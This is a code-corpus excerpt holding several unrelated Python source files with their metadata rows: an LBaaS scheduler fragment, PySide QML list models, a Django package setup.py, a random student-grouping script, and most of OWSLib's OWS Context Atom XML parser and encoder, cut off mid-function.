if device_driver in agent_conf['device_drivers']:
candidates.append(agent)
return candidates
class ChanceScheduler(object):
"""Allocate a loadbalancer agent for a vip in a random way."""
def schedule(self, plugin, context, pool, device_driver):
"""Schedule the pool to an active loadbalancer agent if there
is no enabled agent hosting it.
"""
with context.session.begin(subtransactions=True):
lbaas_agent = plugin.get_lbaas_agent_hosting_pool(
context, pool['id'])
if lbaas_agent:
LOG.debug('Pool %(pool_id)s has already been hosted'
' by lbaas agent %(agent_id)s',
{'pool_id': pool['id'],
'agent_id': lbaas_agent['id']})
return
active_agents = plugin.get_lbaas_agents(context, active=True)
if not active_agents:
LOG.warn(_LW('No active lbaas agents for pool %s'), pool['id'])
return
candidates = plugin.get_lbaas_agent_candidates(device_driver,
active_agents)
if not candidates:
LOG.warn(_LW('No lbaas agent supporting device driver %s'),
device_driver)
return
chosen_agent = random.choice(candidates)
binding = PoolLoadbalancerAgentBinding()
binding.agent = chosen_agent
binding.pool_id = pool['id']
context.session.add(binding)
LOG.debug('Pool %(pool_id)s is scheduled to lbaas agent '
'%(agent_id)s',
{'pool_id': pool['id'],
'agent_id': chosen_agent['id']})
return chosen_agent
| apache-2.0 | -4,766,120,125,139,007,000 | 39.387597 | 79 | 0.597889 | false | 4.260016 | false | false | false |
ryfx/modrana | modules/gui_modules/gui_qml/list_models.py | 1 | 3121 | # -*- coding: utf-8 -*-
#----------------------------------------------------------------------------
# A modRana QML GUI list models
#----------------------------------------------------------------------------
# Copyright 2013, Martin Kolman
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#---------------------------------------------------------------------------
# QML list model handling
from PySide import QtCore
# partially based on the gPodderListModel
# list model
class BaseListModel(QtCore.QAbstractListModel):
def __init__(self, objects=None):
QtCore.QAbstractListModel.__init__(self)
if objects is None:
objects = []
self._objects = objects
# self.setRoleNames({0: 'data', 1: 'section'})
self.setRoleNames({0: 'data'})
def sort(self):
# Unimplemented for the generic list model
self.reset()
def insert_object(self, o):
self._objects.append(o)
self.sort()
def remove_object(self, o):
self._objects.remove(o)
self.reset()
def set_objects(self, objects):
self._objects = objects
self.sort()
def get_objects(self):
return self._objects
def get_object(self, index):
return self._objects[index.row()]
def rowCount(self, parent=QtCore.QModelIndex()):
return len(self.get_objects())
def data(self, index, role):
if index.isValid():
if role == 0:
return self.get_object(index)
elif role == 1:
return self.get_object(index).qsection
return None
class NestedListModel(BaseListModel):
def __init__(self):
BaseListModel.__init__(self)
class ListItem(QtCore.QObject):
def __init__(self, data, children=None):
if not children: children = []
QtCore.QObject.__init__(self)
self._data = data
self._children = children
changed = QtCore.Signal()
childrenChanged = QtCore.Signal()
def _getData(self):
return self._data
def _getChildCount(self):
return len(self._children)
@QtCore.Slot(int, result=QtCore.QObject)
def _getChild(self, index):
try:
return self._children[index]
except IndexError:
# index out of bounds
return None
data = QtCore.Property(QtCore.QObject, _getData, notify=changed)
childrenCount = QtCore.Property(QtCore.QObject, _getChildCount, notify=childrenChanged)
class ListItem(QtCore.QObject):
pass
| gpl-3.0 | 1,145,764,220,678,838,900 | 29.300971 | 91 | 0.59404 | false | 4.32871 | false | false | false |
gregplaysguitar/django-dps | setup.py | 2 | 1171 | #!/usr/bin/env python
import os
from setuptools import setup, find_packages
# if there's a converted (rst) readme, use it, otherwise fall back to markdown
if os.path.exists('README.rst'):
readme_path = 'README.rst'
else:
readme_path = 'README.md'
# avoid importing the module
exec(open('dps/_version.py').read())
setup(
name='django-dps',
version=__version__,
packages=find_packages(),
license='BSD License',
url="https://github.com/gregplaysguitar/django-dps/",
maintainer="Greg Brown",
maintainer_email="[email protected]",
description='Django integrations for the DPS payment gateway',
long_description=open(readme_path).read(),
install_requires=[
'Django>=1.7',
],
include_package_data=True,
package_data={},
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Framework :: Django',
'License :: OSI Approved :: BSD License',
],
)
| bsd-2-clause | 8,254,026,549,920,261,000 | 24.456522 | 78 | 0.6345 | false | 3.877483 | false | false | false |
profkronholm/COSCnotes | COSCnotes/day016/assigngroups.py | 1 | 1717 | #!/usr/bin python
# simple script to select group of students at random.
# Written by Bill Kronholm
# Sep 1, 2014
# No rights reserved.
from random import shuffle
from time import strftime
import subprocess # used for printing
# list of students names as strings
students = [
"Karmen Rosebrock",
"Erna Halm",
"Krystle Poage",
"Dori Renick",
"Scot Mayr",
"Kenyetta Fyock",
"Nicola Wind",
"Janee Garibaldi",
"Dot Tinkham",
"Kathy Christian",
"Kym Costigan",
"Sharolyn Rondon",
"Samira Poudrier",
"Cythia Licon",
"Madelene Sherry",
"Ignacia Riemann",
"Vince Edmundson",
"Sharyl Buch",
"Mayola Balk",
"Leonia Simek"
]
groupsize = 3 # how many people in each group
numberofstudents = len(students)
numberofgroups = numberofstudents/groupsize
groups = {n:[] for n in range(numberofgroups)}
shuffle(students) # randomize the list
n=0
# separate into groups
while len(students) > 0:
groups[n].append(students.pop(0))
n = (n+1)%numberofgroups
# txt file to save to
today = strftime("%Y%m%d")
f = open(today+".txt", 'w')
# print them out and save to txt file
for key in groups.keys():
print "Group", key
f.write("Group "+str(key)+"\n")
for x in groups[key]:
f.write(x+"\n")
print x
f.write("\n")
print ""
# close the txt file
f.close()
# open the txt file for reading
f = open(today+".txt", 'r')
# print the txt file
# code taken from
# http://stackoverflow.com/questions/12723818/print-to-standard-printer-from-python
lpr = subprocess.Popen("/usr/bin/lpr", stdin = subprocess.PIPE)
lpr.stdin.write(f.read())
# close the txt file again
f.close()
print "Done. Go check the printer."
| gpl-2.0 | 6,200,605,508,681,465,000 | 20.197531 | 83 | 0.655795 | false | 2.960345 | false | false | false |
ocefpaf/OWSLib | owslib/owscontext/atom.py | 5 | 37822 | # -*- coding: utf-8 -*-
# =============================================================================
# Authors : Alexander Kmoch <[email protected]>
#
# =============================================================================
"""
API for OGC Web Services Context Document (OWS Context) format.
ATOM XML Encoding: http://www.opengeospatial.org/standards/owc
OGC OWS Context Atom Encoding Standard 1.0 (12-084r2)
"""
from owslib.etree import etree, ParseError
from owslib import util
from owslib.namespaces import Namespaces
from owslib.util import nspath_eval, element_to_string
from owslib.util import log
from owslib.owscontext.common import is_empty, extract_p, \
try_int, try_float
# default variables
add_namespaces = {"georss": "http://www.georss.org/georss",
"owc": "http://www.opengis.net/owc/1.0",
"xml": "http://www.w3.org/XML/1998/namespace"}
def get_namespaces():
n = Namespaces()
ns = n.get_namespaces(["atom", "dc", "gml", "gml32", "xlink"])
ns.update(add_namespaces)
ns[None] = n.get_namespace("atom")
return ns
ns = get_namespaces()
def nspv(path):
"""
short-hand syntax seen in waterml2.py
:param path: xpath namespace aware
:return: xml element
"""
return nspath_eval(path, ns)
def ns_elem(ns_prefix, elem_name):
ns_uri = ns.get(ns_prefix)
if ns_uri is not None:
return """{%(ns_uri)s}%(elem_name)s""" % {"ns_uri": ns_uri,
"elem_name": elem_name}
def parse_owc_content(content_node):
mimetype = util.testXMLAttribute(content_node, 'type')
url = util.testXMLAttribute(content_node, 'href')
title = util.testXMLAttribute(content_node, 'title')
child_elem = None
if len(list(content_node)) > 0:
child_elem = element_to_string(
list(content_node)[0], False)
content_dict = {
"type": mimetype,
"url": url,
"content": str(child_elem),
"title": title
}
return content_dict
def parse_entry(entry_node):
"""
parse an aotm entry into a feature/resource dict to build OwcResource from
:param entry_node: xml element root node of the atom:entry
:return: dictionary for OwcResource.from_dict()
"""
resource_base_dict = {
"type": "Feature",
"id": None,
"geometry": None,
"properties": {
'title': None,
'abstract': None,
'updated': None,
'date': None,
'authors': [],
'publisher': None,
'rights': None,
'categories': [],
"links": {
"alternates": [],
"previews": [],
"data": [],
"via": [],
},
'offerings': [],
'active': None,
'minscaledenominator': None,
'maxscaledenominator': None,
'folder': None
}
}
# <id>ftp://ftp.remotesensing.org/pub/geotiff/samples/gdal_eg/cea.txt</id>
val = entry_node.find(util.nspath_eval('atom:id', ns))
id = util.testXMLValue(val)
# log.debug("entry :id %s :: %s", id, val)
resource_base_dict.update({"id": id})
# <title>GeoTIFF Example</title>
val = entry_node.find(util.nspath_eval('atom:title', ns))
title = util.testXMLValue(val)
# log.debug("entry: title %s :: %s", id, val)
resource_base_dict['properties'].update({"title": title})
# <updated>2011-11-01T00:00:00Z</updated>
val = entry_node.find(util.nspath_eval('atom:updated', ns))
update_date = util.testXMLValue(val)
# log.debug("entry: updated %s :: %s", update_date, val)
resource_base_dict['properties'].update({"updated": update_date})
# <dc:publisher>
val = entry_node.find(util.nspath_eval('dc:publisher', ns))
publisher = util.testXMLValue(val)
# log.debug("entry: dc:publisher %s :: %s", publisher, val)
resource_base_dict['properties'].update({"publisher": publisher})
# <dc:rights>
val = entry_node.find(util.nspath_eval('dc:rights', ns))
rights = util.testXMLValue(val)
# log.debug("entry: rights %s :: %s", rights, val)
resource_base_dict['properties'].update({"rights": rights})
# <georss:where>
val = entry_node.find(util.nspath_eval('georss:where', ns))
if val is not None:
if len(list(val)) > 0:
# xmltxt = etree.tostring(
# list(val)[0], encoding='utf8', method='xml')
xmltxt = element_to_string(
list(val)[0], False)
# TODO here parse geometry??
# log.debug("entry: geometry %s :: %s", xmltxt, val)
resource_base_dict.update({"geometry": xmltxt.decode('utf-8')})
# <content type = "text" > aka subtitle, aka abstract
val = entry_node.find(util.nspath_eval('atom:content', ns))
subtitle = util.testXMLValue(val)
# log.debug("entry: subtitle %s :: %s", subtitle, val)
resource_base_dict['properties'].update({"abstract": subtitle})
# <author> ..
# <name>
# <email>
vals = entry_node.findall(util.nspath_eval('atom:author', ns))
authors = []
for val in vals:
val_name = val.find(util.nspath_eval('atom:name', ns))
val_email = val.find(util.nspath_eval('atom:email', ns))
val_uri = val.find(util.nspath_eval('atom:uri', ns))
name = util.testXMLValue(val_name)
email = util.testXMLValue(val_email)
uri = util.testXMLValue(val_uri)
author = {
"name": name,
"email": email,
"uri": uri
}
# log.debug("entry: author %s :: %s", author, vals)
if not is_empty(author):
authors.append(author)
resource_base_dict['properties'].update({"authors": authors})
# <link rel="enclosure" type="image/png"
# length="12345" title="..." href="http://o..."/>
# <link rel="icon" type="image/png" title="Preview f..."
# href="http://..."/>
# <link rel="via" type="application/vnd.ogc.wms_xml"
# title="Original .." href="...."/>
vals = entry_node.findall(util.nspath_eval('atom:link', ns))
links_alternates = []
links_previews = []
links_data = []
links_via = []
for val in vals:
rel = util.testXMLAttribute(val, 'rel')
href = util.testXMLAttribute(val, 'href')
mimetype = util.testXMLAttribute(val, 'type')
lang = util.testXMLAttribute(val, 'lang')
title = util.testXMLAttribute(val, 'title')
length = util.testXMLAttribute(val, 'length')
link = {
"href": href,
"type": mimetype,
"length": length,
"lang": lang,
"title": title,
"rel": rel
}
# log.debug("entry: link %s :: %s", link, vals)
if link.get("rel") == "alternate" and not is_empty(link):
links_alternates.append(link)
elif link.get("rel") == "icon" and not is_empty(link):
links_previews.append(link)
elif link.get("rel") == "enclosure" and not is_empty(link):
links_data.append(link)
elif link.get("rel") == "via" and not is_empty(link):
links_via.append(link)
else:
log.warn(
"unknown link type in Ows Resource entry section: %r", link)
resource_base_dict['properties']['links'].update(
{"alternates": links_alternates})
resource_base_dict['properties']['links'].update(
{"previews": links_previews})
resource_base_dict['properties']['links'].update({"data": links_data})
resource_base_dict['properties']['links'].update({"via": links_via})
# <owc:offering code="http://www.opengis.net/spec/owc-at...">
# <owc:content type="image/tiff" href=".."
# <owc:offering code="http://www.opengis.net/spec....l">
# <owc:content type="application/gml+xml">
# <owc:operation code="GetCapabilities" method="GET"
# type="applica..." href="..."
# <owc:request type="application/xml"> ..
# <owc:styleSet>
# <owc:name>raster</owc:name>
# <owc:title>Default Raster</owc:title>
# <owc:abstract>A sample style that draws a </owc:abstract>
# <owc:legendURL href="h...." type="image/png"/>
# </owc:styleSet>
offering_nodes = entry_node.findall(util.nspath_eval('owc:offering', ns))
offerings = []
for offering_node in offering_nodes:
offering_code = util.testXMLAttribute(offering_node, 'code')
operations = []
contents = []
styles = []
operation_nodes = offering_node.findall(
util.nspath_eval('owc:operation', ns))
for op_val in operation_nodes:
operations_code = util.testXMLAttribute(op_val, 'code')
http_method = util.testXMLAttribute(op_val, 'method')
mimetype = util.testXMLAttribute(op_val, 'type')
request_url = util.testXMLAttribute(op_val, 'href')
req_content_val = val.find(util.nspath_eval('owc:request', ns))
req_content = None
if req_content_val is not None:
req_content = parse_owc_content(req_content_val)
# TODO no example for result/response
op_dict = {
"code": operations_code,
"method": http_method,
"type": mimetype,
"href": request_url,
"request": None if is_empty(req_content) else req_content,
"result": None
}
# log.debug("entry: operation %s :: %s", op_dict, vals)
if not is_empty(op_dict):
operations.append(op_dict)
content_nodes = offering_node.findall(
util.nspath_eval('owc:content', ns))
for cont_val in content_nodes:
content_dict = parse_owc_content(cont_val)
# log.debug("entry: content_dict %s :: %s", content_dict, vals)
if not is_empty(content_dict):
contents.append(content_dict)
style_nodes = offering_node.findall(
util.nspath_eval('owc:styleSet', ns))
for style_val in style_nodes:
val_name = style_val.find(util.nspath_eval('owc:name', ns))
val_title = style_val.find(util.nspath_eval('owc:title', ns))
val_abstr = style_val.find(util.nspath_eval('owc:abstract', ns))
val_uri = style_val.find(util.nspath_eval('owc:legendURL', ns))
name = util.testXMLValue(val_name)
title = util.testXMLValue(val_title)
abstr = util.testXMLValue(val_abstr)
legend_url = util.testXMLAttribute(val_uri, 'href')
style_set = {
"name": name,
"title": title,
"abstract": abstr,
"default": None,
"legendURL": legend_url,
"content": None
}
# log.debug("entry: style_set %s :: %s", style_set, vals)
if not is_empty(style_set):
styles.append(style_set)
offering_dict = {
"code": offering_code,
"operations": operations,
"contents": contents,
"styles": styles
}
if offering_code is not None:
offerings.append(offering_dict)
resource_base_dict['properties'].update(
{"offerings": offerings})
# TODO no examples for active attribute
# <owc:minScaleDenominator>2500</owc:minScaleDenominator>
val = entry_node.find(util.nspath_eval('owc:minScaleDenominator', ns))
min_scale_denominator = util.testXMLValue(val)
# log.debug("entry: min-scale-... %s :: %s", min_scale_denominator, val)
resource_base_dict['properties'].update(
{"minscaledenominator": min_scale_denominator})
# <owc:maxScaleDenominator>25000</owc:maxScaleDenominator>
val = entry_node.find(util.nspath_eval('owc:maxScaleDenominator', ns))
max_scale_denominator = util.testXMLValue(val)
# log.debug("entry: max_scale_... %s :: %s", max_scale_denominator, val)
resource_base_dict['properties'].update(
{"maxscaledenominator": max_scale_denominator})
# TODO no examples for folder attribute
return resource_base_dict
def decode_atomxml(xml_string):
"""
here parse atom xml to a dict for instanciating of OWC:Context
:param xmlstring:
:return: OwcContext-ready dict
"""
context_base_dict = {
"type": "FeatureCollection",
"id": None,
"bbox": None,
"properties": {
"lang": None,
"links": {
"profiles": [],
"via": [],
},
'title': None,
'abstract': None,
'updated': None,
'authors': [],
'publisher': None,
'generator': None,
'display': None,
'rights': None,
'date': None,
'categories': [],
},
'features': []
}
feed_root = etree.fromstring(xml_string)
# feed_root = etree.parse(xml_bytes)
# feed_root xml lang use?
# # log.debug(feed_root)
# feed xml:lang=en
# lang = feed_root.get('{http://www.w3.org/XML/1998/namespace}lang')
lang = util.testXMLAttribute(
feed_root, '{http://www.w3.org/XML/1998/namespace}lang')
# log.debug("lang %s ", lang)
context_base_dict['properties'].update({"lang": lang})
# <id>
val = feed_root.find(util.nspath_eval('atom:id', ns))
id = util.testXMLValue(val)
# log.debug("id %s :: %s", id, val)
context_base_dict.update({"id": id})
# <link rel="profile"
# href="http://www.opengis.net/spec/owc-atom/1.0/req/core"
# title="compliant bla bla"
# < link rel = "via" type = "application/xml" href = "..." title = "..."
vals = feed_root.findall(util.nspath_eval('atom:link', ns))
links_profile = []
links_via = []
for val in vals:
rel = util.testXMLAttribute(val, 'rel')
href = util.testXMLAttribute(val, 'href')
mimetype = util.testXMLAttribute(val, 'type')
lang = util.testXMLAttribute(val, 'lang')
title = util.testXMLAttribute(val, 'title')
length = util.testXMLAttribute(val, 'length')
link = {
"href": href,
"type": mimetype,
"length": length,
"lang": lang,
"title": title,
"rel": rel
}
# log.debug("link %s :: %s", link, vals)
if link.get("rel") == "profile" and not is_empty(link):
links_profile.append(link)
elif link.get("rel") == "via" and not is_empty(link):
links_via.append(link)
else:
log.warn("unknown link type in Ows Context section: %r", link)
context_base_dict['properties']['links'].update(
{"profiles": links_profile})
context_base_dict['properties']['links'].update({"via": links_via})
# <title>
val = feed_root.find(util.nspath_eval('atom:title', ns))
title = util.testXMLValue(val)
# log.debug("title %s :: %s", title, val)
context_base_dict['properties'].update({"title": title})
# <subtitle type = "html"
val = feed_root.find(util.nspath_eval('atom:subtitle', ns))
subtitle = util.testXMLValue(val)
# log.debug("subtitle %s :: %s", subtitle, val)
context_base_dict['properties'].update({"abstract": subtitle})
# <author> ..
# <name>
# <email>
vals = feed_root.findall(util.nspath_eval('atom:author', ns))
authors = []
for val in vals:
val_name = val.find(util.nspath_eval('atom:name', ns))
val_email = val.find(util.nspath_eval('atom:email', ns))
val_uri = val.find(util.nspath_eval('atom:uri', ns))
name = util.testXMLValue(val_name)
email = util.testXMLValue(val_email)
uri = util.testXMLValue(val_uri)
author = {
"name": name,
"email": email,
"uri": uri
}
# log.debug("author %s :: %s", author, vals)
if not is_empty(author):
authors.append(author)
context_base_dict['properties'].update({"authors": authors})
# <georss:where>
val = feed_root.find(util.nspath_eval('georss:where', ns))
if val is not None:
if len(list(val)) > 0:
xmltxt = element_to_string(
list(val)[0], False)
# log.debug("geometry %s :: %s", xmltxt, val)
context_base_dict['properties'].update({"bbox": xmltxt.decode('utf-8')})
# <updated>2012-11-04T17:26:23Z</updated>
val = feed_root.find(util.nspath_eval('atom:updated', ns))
update_date = util.testXMLValue(val)
# log.debug("updated %s :: %s", update_date, val)
context_base_dict['properties'].update({"updated": update_date})
# <dc:date>2009-01-23T09:08:56.000Z/2009-01-23T09:14:08.000Z</dc:date>
val = feed_root.find(util.nspath_eval('dc:date', ns))
time_interval_of_interest = util.testXMLValue(val)
# log.debug("dc:date %s :: %s", time_interval_of_interest, val)
context_base_dict['properties'].update(
{"date": time_interval_of_interest})
# <rights>
val = feed_root.find(util.nspath_eval('atom:rights', ns))
rights = util.testXMLValue(val)
# log.debug("rights %s :: %s", rights, val)
context_base_dict['properties'].update({"rights": rights})
# <dc:publisher>
val = feed_root.find(util.nspath_eval('dc:publisher', ns))
publisher = util.testXMLValue(val)
# log.debug("dc:publisher %s :: %s", publisher, val)
context_base_dict['properties'].update({"publisher": publisher})
# <owc:display>
# <owc:pixelWidth>
val_display = feed_root.find(util.nspath_eval('owc:display', ns))
val_pixel_width = None if val_display is None \
else val_display.find(util.nspath_eval('owc:pixelWidth', ns))
val_pixel_height = None if val_display is None \
else val_display.find(util.nspath_eval('owc:pixelHeight', ns))
val_mm_per_pixel = None if val_display is None \
else val_display.find(util.nspath_eval('owc:mmPerPixel', ns))
pixel_width = util.testXMLValue(val_pixel_width)
pixel_height = util.testXMLValue(val_pixel_height)
mm_per_pixel = util.testXMLValue(val_mm_per_pixel)
owc_display = {
"pixelWidth": pixel_width,
"pixelHeight": pixel_height,
"mmPerPixel": mm_per_pixel
}
# log.debug("display %s :: %s", owc_display, val_display)
if not is_empty(owc_display):
context_base_dict['properties'].update({"display": owc_display})
# <generator uri="http://w.." version="1.0">MiraMon</generator>
val = feed_root.find(util.nspath_eval('atom:generator', ns))
name = util.testXMLValue(val)
version = util.testXMLAttribute(val, 'version')
uri = util.testXMLAttribute(val, 'uri')
owc_generator = {
"name": name,
"version": version,
"uri": uri
}
# log.debug("generator %s :: %s", owc_generator, val)
if not is_empty(owc_generator):
context_base_dict['properties'].update({"generator": owc_generator})
# <category term="maps" label="This file contains maps"/>
vals = feed_root.findall(util.nspath_eval('atom:category', ns))
categories = []
for val in vals:
term = util.testXMLAttribute(val, 'term')
scheme = util.testXMLAttribute(val, 'scheme')
label = util.testXMLAttribute(val, 'label')
category = {
"term": term,
"scheme": scheme,
"label": label
}
# log.debug("category %s :: %s", category, vals)
if not is_empty(category):
categories.append(category)
context_base_dict['properties'].update({"categories": categories})
# <entry> ...
entries = feed_root.findall(util.nspath_eval('atom:entry', ns))
resources = []
for entry in entries:
entry_dict = parse_entry(entry)
if entry_dict.get("id") is not None:
resources.append(entry_dict)
else:
log.warn("feature entry has no id, not allowed: skipping!")
context_base_dict.update({"features": resources})
return context_base_dict
def encode_atomxml(obj_d):
"""
encode instance of OwcContext dict into atom xml encoding,
because we can't do circular imports
:param obj_d: the dict from owscontext to dict
:return: b'atomxml'
"""
# try:
# xml_tree = axml_context(obj_d)
# tree = etree.ElementTree(xml_tree)
# return tree
# except TypeError as te:
# log.warn('problem encoding context to xml', te)
# raise te
# except AttributeError as ae:
# log.warn('problem encoding context to xml', ae)
# raise ae
# except ValueError as ve:
# log.warn('problem encoding context to xml', ve)
# raise ve
# except ParseError as pe:
# log.warn('problem encoding context to xml', pe)
# raise pe
xml_tree = axml_context(obj_d)
tree = etree.ElementTree(xml_tree)
return element_to_string(tree, encoding='utf-8', xml_declaration=False)
def axml_context(d):
"""
encodes base OwcContext as dict to atom xml tree
:param d:
:return:
"""
xml = etree.Element("feed", nsmap=ns)
etree.SubElement(xml, "id").text = d['id']
spec_reference = [axml_link(do) for do in
extract_p('properties.links.profiles', d, [])]
[xml.append(el) for el in spec_reference if el is not None]
area_of_interest = extract_p('bbox', d, None)
if area_of_interest is not None:
try:
gml = etree.fromstring(area_of_interest)
georss = etree.SubElement(xml, ns_elem("georss", "where"))
georss.append(gml)
except Exception as ex:
log.warn('could encode bbox into georss:where', ex)
pass
context_metadata = [axml_link(do) for do in
extract_p('properties.links.via', d, [])]
[xml.append(el) for el in context_metadata if el is not None]
language = extract_p('properties.lang', d, None)
if language is not None:
xml.set(ns_elem("xml", "lang"), language)
title = extract_p('properties.title', d, None)
if title is not None:
etree.SubElement(xml, "title").text = title
# <subtitle type = "html"
subtitle = extract_p('properties.abstract', d, None)
if subtitle is not None:
etree.SubElement(xml, "subtitle").text = subtitle
update_date = extract_p('properties.updated', d, None)
if update_date is not None:
etree.SubElement(xml, "updated").text = update_date
authors = [axml_author(do) for do in extract_p('properties.authors', d, [])]
[xml.append(el) for el in authors if el is not None]
publisher = extract_p('properties.publisher', d, None)
if publisher is not None:
etree.SubElement(xml, ns_elem("dc", "publisher")).text = publisher
creator_application = axml_creator_app(extract_p('properties.generator', d, None))
if creator_application is not None and not is_empty(creator_application):
xml.append(creator_application)
creator_display = axml_display(extract_p('properties.display', d, None))
if creator_display is not None:
xml.append(creator_display)
rights = extract_p('properties.rights', d, None)
if rights is not None:
etree.SubElement(xml, "rights").text = rights
time_interval_of_interest = extract_p('properties.date', d, None)
if time_interval_of_interest is not None:
etree.SubElement(xml, ns_elem("dc", "date")).text = time_interval_of_interest
keywords = [axml_category(do) for do in
extract_p('properties.categories', d, [])]
[xml.append(el) for el in keywords if el is not None]
# here we generate single elements and attach them
resources = [axml_resource(do) for do in
extract_p('features', d, [])]
[xml.append(el) for el in resources if el is not None]
return xml
def axml_resource(d):
"""
encodes an OwcResource as dict into atom xml tree
:param d:
:return:
"""
entry = etree.Element("entry", nsmap=ns)
etree.SubElement(entry, "id").text = d['id']
geospatial_extent = extract_p('geometry', d, None)
if geospatial_extent is not None:
try:
gml = etree.fromstring(geospatial_extent)
georss = etree.SubElement(entry, ns_elem("georss", "where"))
georss.append(gml)
except Exception as ex:
log.warn('could encode geometry into georss:where', ex)
pass
title = d['properties']['title']
if title is not None:
etree.SubElement(entry, "title").text = title
subtitle = extract_p('properties.abstract', d, None)
# <content type = "text" >
if subtitle is not None:
etree.SubElement(entry, "content").text = subtitle
update_date = extract_p('properties.updated', d, None)
if update_date is not None:
etree.SubElement(entry, "updated").text = update_date
authors = [axml_author(do) for do in
extract_p('properties.authors', d, [])]
[entry.append(el) for el in authors if el is not None]
publisher = extract_p('properties.publisher', d, None)
if update_date is not None:
etree.SubElement(entry, ns_elem("dc", "publisher")).text = publisher
rights = extract_p('properties.rights', d, None)
if update_date is not None:
etree.SubElement(entry, ns_elem("dc", "rights")).text = rights
temporal_extent = extract_p('properties.date', d, None)
if temporal_extent is not None:
etree.SubElement(entry, "date").text = temporal_extent
keywords = [axml_category(do) for do in
extract_p('properties.categories', d, [])]
[entry.append(el) for el in keywords if el is not None]
resource_metadata = [axml_link(do) for do in
extract_p('properties.links.via', d, [])]
[entry.append(el) for el in resource_metadata if el is not None]
content_description = [axml_content(do)
for do in extract_p('properties.links.alternates', d, [])]
[entry.append(el) for el in content_description if el is not None]
preview = [axml_link(do) for do in
extract_p('properties.links.preview', d, [])]
[entry.append(el) for el in preview if el is not None]
content_by_ref = [axml_link(do) for do in
extract_p('properties.links.data', d, [])]
[entry.append(el) for el in content_by_ref if el is not None]
offerings = [axml_offering(do) for do in
extract_p('properties.offerings', d, [])]
[entry.append(el) for el in offerings if el is not None]
# TODO no examples for active attribute
active = extract_p('properties.active', d, None)
if active is not None:
etree.SubElement(entry, "active").text = active
min_scale_denominator = try_float(extract_p(
'properties.minscaledenominator', d, None))
# <owc:minScaleDenominator>2500</owc:minScaleDenominator>
if min_scale_denominator is not None:
etree.SubElement(entry, ns_elem(
"owc", "minScaleDenominator")).text = str(min_scale_denominator)
max_scale_denominator = try_float(extract_p(
'properties.maxscaledenominator', d, None))
# <owc:maxScaleDenominator>25000</owc:maxScaleDenominator>
if max_scale_denominator is not None:
etree.SubElement(entry, ns_elem(
"owc", "maxScaleDenominator")).text = str(max_scale_denominator)
# TODO no examples for folder attribute
folder = extract_p('properties.folder', d, None)
if folder is not None:
etree.SubElement(entry, "folder").text = folder
# xml.append(entry)
return entry
def axml_creator_app(d):
# <generator uri="http://w.." version="1.0">MiraMon</generator>
if is_empty(d):
return None
else:
try:
creator_app = etree.Element("generator", nsmap=ns)
title = extract_p('title', d, None)
if title is not None:
creator_app.text = title
uri = extract_p('uri', d, None)
if uri is not None:
creator_app.set("uri", uri)
version = extract_p('version', d, None)
if version is not None:
creator_app.set("version", version)
return creator_app
except Exception as ex:
log.warn('could encode creator_app', ex)
return None
def axml_display(d):
# <owc:display>
# <owc:pixelWidth>
if is_empty(d):
return None
else:
try:
creator_display = etree.Element(ns_elem("owc", "display"), nsmap=ns)
pixel_width = try_int(extract_p('pixelWidth', d, None))
if pixel_width is not None:
etree.SubElement(creator_display, ns_elem(
"owc", "pixelWidth")).text = str(pixel_width)
pixel_height = try_int(extract_p('pixelHeight', d, None))
if pixel_height is not None:
etree.SubElement(creator_display, ns_elem(
"owc", "pixelHeight")).text = str(pixel_height)
mm_per_pixel = try_float(extract_p('mmPerPixel', d, None))
if mm_per_pixel is not None:
etree.SubElement(creator_display, ns_elem(
"owc", "mmPerPixel")).text = str(mm_per_pixel)
return creator_display
except Exception as ex:
log.warn('could encode creator_display', ex)
return None
def axml_link(d):
# < link rel = "via" type = "application/xml" href = "..." title = "..."
if is_empty(d):
return None
else:
try:
link = etree.Element("link", nsmap=ns)
href = extract_p('href', d, None)
if href is not None:
link.set("href", href)
rel = extract_p('rel', d, None)
if rel is not None:
link.set("rel", rel)
mimetype = extract_p('type', d, None)
if mimetype is not None:
link.set("type", mimetype)
lang = extract_p('lang', d, None)
if lang is not None:
link.set("lang", lang)
title = extract_p('title', d, None)
if title is not None:
link.set("title", title)
length = try_int(extract_p('length', d, None))
if length is not None:
link.set("length", str(length))
return link
except Exception as ex:
log.warn('could not encode link', ex)
return None
def axml_category(d):
# <category term="maps" label="This file contains maps"/>
if is_empty(d):
return None
else:
try:
category = etree.Element("category", nsmap=ns)
term = extract_p('term', d, None)
if term is not None:
category.set("term", term)
scheme = extract_p('scheme', d, None)
if scheme is not None:
category.set("scheme", scheme)
label = extract_p('label', d, None)
if label is not None:
category.set("label", label)
return category
except Exception as ex:
log.warn('could encode category', ex)
return None
def axml_author(d):
# <author> ..
# <name>
# <email>
if is_empty(d):
return None
else:
try:
author = etree.Element("author", nsmap=ns)
name = extract_p('name', d, None)
if name is not None:
etree.SubElement(author, "name").text = name
email = extract_p('email', d, None)
if email is not None:
etree.SubElement(author, "email").text = email
uri = extract_p('uri', d, None)
if uri is not None:
etree.SubElement(author, "uri").text = uri
return author
except Exception as ex:
log.warn('could encode author', ex)
return None
def axml_offering(d):
# <owc:offering code="http://www.opengis.net/spec/owc-at...">
# <owc:offering code="http://www.opengis.net/spec....l">
# <owc:content type="application/gml+xml">
if is_empty(d):
return None
else:
try:
offering_code = extract_p('code', d, None)
offering = etree.Element(ns_elem("owc", "offering"), attrib={"code": offering_code}, nsmap=ns)
# use axml_operation here
operations = [axml_operation(do) for do in
extract_p('operations', d, [])]
[offering.append(el) for el in operations if el is not None]
# use axml_content here
contents = [axml_content(do) for do in
extract_p('contents', d, [])]
[offering.append(el) for el in contents if el is not None]
# use axml_styeset here
styles = [axml_styleset(do) for do in
extract_p('styles', d, [])]
[offering.append(el) for el in styles if el is not None]
return offering
except Exception as ex:
log.warn('could encode offering', ex)
return None
def axml_operation(d):
# <owc:operation code="GetCapabilities" method="GET"
# type="applica..." href="..."
# <owc:request type="application/xml"> ..
# etree.SubElement(entry, ns_elem("owc", "offering"), name="blah").text = "some value1"
if is_empty(d):
return None
else:
try:
operation = etree.Element(ns_elem("owc", "operation"), nsmap=ns)
